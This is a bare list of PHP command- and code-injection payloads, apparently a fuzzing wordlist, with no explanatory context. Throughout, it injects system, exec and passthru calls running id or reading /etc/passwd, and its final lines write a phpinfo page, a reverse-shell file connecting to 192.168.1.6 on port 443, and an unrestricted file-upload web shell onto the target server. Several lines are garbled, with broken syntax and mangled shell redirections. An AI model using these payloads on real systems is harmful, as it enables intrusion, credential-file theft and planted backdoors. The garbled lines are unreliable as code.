;id
'id'
;id;
&&id
echo 'id'
system('id')
;system('id')
system("id")
SYSTEM("id")
system(%27id%27)
system('id');phpinfo()
SYSTEM('id');PHPINFO()
;system('/usr/bin/id')
system('cat /etc/passwd');
;system('cat /etc/passwd')
shell exec("id")
SHELL EXEC("id")
exec("id")
EXEC("id")
exec("ping -c 4 192.168.1.6")
passthru("id")
PASSTHRU("id")
phpinfo()
phpinfo();id
PHPINFO()
PHPINFO();id
phpinfo();system('cat /etc/passwd')
phpinfo();system('id')
PHPINFO();SYSTEM('id')
print_r($_POST);system('id')
PRINT_R($_POST);SYSTEM('id')
pcntl_exec("/usr/bin/uptime")
readfile?"/etc/passwd")
file get contents ("/etc/passwd")
$file = fopen ("testl.txt", "w"); echo fwrite($file, "Hello World. Testing!"); fclose($file)
$file = fopen ("phpinfo-1.php", "W"); echo fwrite ($file, "<?php phpinfo(); ?>"); fclose ($file)
$file = fopen("pshell.php", "w"); echo fwrite($file, "php -r '$sock=fsockopen ('192.168.1.6' ,443) ;' /bin/sh -i <83 >83 2-83' ;"); fclose($file)
$file = fopen ("upload2.php", "w"); echo fwrite($file, '<html><form action="upload2.php" method="post" enctype="multipart/form-data">Select image to upload; <input type="file" name="fileToUpload" id="fileToUpload"><input type="submit" value="Upload" name="submit"></form></html><?php if( isset ($_POST["submit"])){ $file_name = $_FILES["fileToUpload"] ["name"]; $file_tmp_name = $FILES["fIleToUpload"("tmpname"]; if (move uploaded_file($file_tmp_ name, " ./" . $file_name)) { echo "ok"; } } ?>'); fclose($file)
